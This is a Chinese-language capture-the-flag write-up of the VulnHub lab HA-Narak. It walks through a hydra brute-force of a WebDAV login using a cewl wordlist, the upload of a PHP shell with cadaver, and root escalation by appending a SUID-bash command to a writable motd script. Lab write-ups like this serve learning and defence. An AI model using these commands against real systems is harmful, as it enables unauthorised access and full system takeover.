vulnhub HA-Narak

0x01 端口扫描

0x02 web渗透

给了一堆图片和一段抽象文字,目录爆破的同时把图片全部检查一下:

1
wget http://10.10.10.142/images/{1..20}.jpg http://10.10.10.142/images/666.jpg

行不通,看目录爆破

扫到了401未授权的页面webdav

实在没思路,去看了wp

cewl生成字典

web页面有一长段文字,对其进行cewl爬取,生成字典,爆破登录页

1
cewl 10.10.10.142 -w 1.txt

1
hydra http-get -L 1.txt -P 1.txt 10.10.10.142/webdav

拿到了凭据:yamdoot@Swarg

可以登录,使用客户端工具上传文件:

webdav利用

cadaver工具可以连接webdav服务

1
2
cadaver
open http://10.10.10.142/webdav

上传shell:

1
put shell.php

0x03 提权

在~inferno拿到user flag,且是串可解码的md5:

尝试ssh登录其他用户失败
尝试各基础向量失败,跑linEnum:

没什么有用信息,跑linpeas:

可惜无法解密

这好像是web渗透阶段的hint…

果然,没什么用
但是注意到这个路径十分有趣,其中包含了用户/mnt/karma

注意:此处的大大的标红也非常引起我们的兴趣,当成一个线索之后详细调查
接着往下看,发现的这个可写文件也很有趣,名字也很有本机的命名风格,查看:

是hint,解码一把嗦:

inferno@chitragupt

登录到了inferno,但是再次枚举各向量也未发现出路
转移思路到之前linpeas的爆红:

按照利用,和fowsniff的提权方法类似,劫持root的执行文件,本方法直接替换了两人的bash执行文件

1
2
echo "cp /bin/bash /home/inferno/bash && chmod u+s /home/inferno/bash" >> /etc/update-motd.d/00-header
./bash -p

按照利用成功提权


vulnhub HA-Narak
https://fyhypo.github.io/blog/vulnhub/vulnhub HA-Narak/
作者
FYHypo
发布于
2024年8月31日
许可协议